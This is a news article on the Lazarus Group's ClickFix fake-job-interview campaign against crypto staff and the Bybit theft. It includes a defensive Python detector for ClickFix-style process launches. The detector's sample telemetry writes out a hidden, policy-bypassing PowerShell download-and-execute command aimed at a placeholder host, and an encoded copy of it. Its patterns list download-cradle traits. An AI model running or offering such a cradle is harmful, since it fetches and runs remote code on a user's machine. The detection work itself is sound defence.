A recent cybersecurity report by Sekoia has shed light on an evolving threat posed by the Lazarus Group, the notorious North Korea-linked hacking organization. This group is now leveraging a tactic known as “ClickFix” to specifically target job seekers in the cryptocurrency sector, particularly within centralized finance (CeFi).
This new approach is an adaptation of the group’s earlier “Contagious Interview” campaign, which targeted developers and engineers in artificial intelligence and crypto-related roles, and it shows how readily the group adapts its lures to job-market trends.
Lazarus Exploits Crypto Hiring
In the newly observed campaign, Lazarus has shifted its focus to non-technical professionals, such as marketing and business development staff, by impersonating major crypto firms including Coinbase, KuCoin and Kraken, and even the stablecoin issuer Tether. The choice of lures shows the group’s intent to cast a wider net and attract a broader range of candidates.
The attackers create fraudulent websites that mimic legitimate job application portals to lure candidates with enticing fake interview invitations. Often, these sites include plausible application forms and even requests for video introductions, contributing to a false sense of legitimacy.
When the candidate tries to record the video, the page shows a fabricated error claiming a webcam or driver malfunction and, as a “fix”, instructs the user to copy a PowerShell command and run it themselves. Because the victim launches the command, no browser exploit or downloaded installer is needed: the download-and-execute step runs from a process the user started, so browser download warnings and similar controls never come into play, and the victim believes they have only repaired a camera problem.
The ClickFix methodology is relatively new but gaining traction, largely because of its psychological simplicity: users think they are troubleshooting a technical issue and do not realise they are executing malware. According to Sekoia, this campaign draws on 184 fake interview invitations and references at least 14 well-known companies to bolster its credibility.
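The trace a ClickFix infection leaves on an endpoint is a shell spawned directly from a user-facing parent (explorer.exe when the victim pastes into the Win+R Run dialog, or a browser) with a download-and-run cradle on its command line. The following detection heuristic over Sysmon Event ID 1-style process-creation records is an added example written for this page; it is not code from Sekoia’s report or from the campaign itself, and every event, hostname and URL in it is constructed for illustration.

```python
"""Flag ClickFix-style executions in process-creation telemetry.

Added example, not from the Sekoia report or the article. The heuristic scores a
shell launch by (a) whether its parent is a user-facing program, i.e. a human
typed or pasted the command, and (b) how many download-cradle traits the command
line shows, including inside a -EncodedCommand payload. All sample events,
hosts and URLs below are constructed for the example.
"""
import base64
import re
from dataclasses import dataclass, field
from typing import Optional

# Parents implying a person launched the shell (Run dialog, browser "open").
USER_LAUNCHED_PARENTS = {"explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}

# Download-cradle traits; each matching name adds one point.
CRADLE_PATTERNS = {
    "web_request": re.compile(
        r"\b(iwr|irm|Invoke-WebRequest|Invoke-RestMethod|curl|wget|"
        r"DownloadString|DownloadFile)\b", re.I),
    "invoke_expression": re.compile(r"\b(iex|Invoke-Expression)\b", re.I),
    "hidden_window": re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    "encoded_command": re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "policy_bypass": re.compile(r"-e(p|xecutionpolicy)\s+bypass", re.I),
    "pipe_to_shell": re.compile(r"\|\s*(powershell|pwsh|cmd|bash|sh)\b", re.I),
}
USER_LAUNCH_WEIGHT = 2  # parent is a user-facing program
ALERT_THRESHOLD = 3     # a plain interactive shell from explorer scores 2: no alert


@dataclass
class Finding:
    record_id: int
    score: int
    indicators: list = field(default_factory=list)


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str) -> str:
    """Return the UTF-16LE text behind a -EncodedCommand argument, or ''."""
    m = re.search(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})", cmdline, re.I)
    if not m:
        return ""
    try:
        raw = base64.b64decode(m.group(1), validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return ""
    return raw.decode("utf-16-le", errors="ignore")


def score_event(event: dict) -> Optional[Finding]:
    """Score one process-creation record; None if the image is not a shell."""
    if _basename(event["image"]) not in SHELLS:
        return None
    cmdline = event["command_line"]
    # Scan the raw line and the decoded payload together so an encoded cradle
    # still trips the web_request / invoke_expression patterns.
    text = f"{cmdline} {decode_encoded_command(cmdline)}"
    indicators = [name for name, pat in CRADLE_PATTERNS.items() if pat.search(text)]
    score = len(indicators)
    if _basename(event["parent_image"]) in USER_LAUNCHED_PARENTS:
        indicators.append("user_launched_parent")
        score += USER_LAUNCH_WEIGHT
    return Finding(event["record_id"], score, indicators)


def find_clickfix(events: list) -> list:
    """Return the findings that reach the alert threshold, in record order."""
    return [f for f in (score_event(e) for e in events) if f and f.score >= ALERT_THRESHOLD]


# Constructed sample telemetry (hypothetical host paths, URL and payload).
_PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
_ENCODED = base64.b64encode(
    "iex (irm https://recruit.example.invalid/fix)".encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"record_id": 1, "parent_image": r"C:\Windows\explorer.exe", "image": _PS,
     "command_line": "powershell.exe"},                                   # user opened a shell
    {"record_id": 2, "parent_image": r"C:\Windows\System32\services.exe", "image": _PS,
     "command_line": r"powershell.exe -File C:\ops\update.ps1"},          # scheduled admin task
    {"record_id": 3, "parent_image": r"C:\Windows\explorer.exe", "image": _PS,
     "command_line": 'powershell -w hidden -ep bypass -c "iex (iwr https://recruit.example.invalid/drivers)"'},
    {"record_id": 4, "parent_image": r"C:\Windows\explorer.exe", "image": _PS,
     "command_line": f"powershell -nop -enc {_ENCODED}"},                 # same cradle, encoded
    {"record_id": 5, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe", "command_line": "notepad.exe resume.txt"},
]

if __name__ == "__main__":
    for finding in find_clickfix(SAMPLE_EVENTS):
        print(finding)
```

Records 3 and 4 are reported; the plain interactive shell (record 1) and the scheduled administrative script (record 2) stay below the threshold. The parent-process weight is what separates a pasted Run-dialog command from the same cradle launched by a management agent, so tune `USER_LAUNCHED_PARENTS` and the threshold to your own fleet’s baseline before alerting on it.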
This latest tactic highlights Lazarus’s growing sophistication in social engineering and its willingness to exploit the professional aspirations of people in the highly competitive crypto job market. It also widens the group’s targeting criteria to include staff who, while not involved in coding or network security, may handle sensitive information or hold accounts and access that can be abused to reach an employer’s systems.
Despite the rise of ClickFix, Sekoia reported that the original Contagious Interview campaign remains active. This parallel deployment indicates that North Korea’s state-sponsored cybercriminals may be testing the effectiveness of their methods against different demographics. In both instances, the campaigns share a common goal—delivering info-stealing malware through trusted channels and manipulating victims into self-infection.
Lazarus Behind Bybit Hack
In a related matter, the Federal Bureau of Investigation (FBI) officially attributed the $1.5 billion theft from the Bybit exchange to the Lazarus Group, under the “TraderTraitor” label that the FBI and CISA use for this activity cluster. TraderTraitor operations approach employees of crypto firms with fake job offers and persuade them to install trojanized cryptocurrency-trading applications of the same name.
These applications are built with cross-platform JavaScript and Node.js so that they look and behave like legitimate trading tools, but they embed malware designed to steal private keys and sign and submit fraudulent transactions on the blockchain, which is exactly the kind of access a single successful lure can hand an attacker.
As the threat landscape continues to evolve, understanding the tactical shifts employed by groups like Lazarus is crucial for individuals and organizations alike in fortifying their defenses against these sophisticated cyber threats.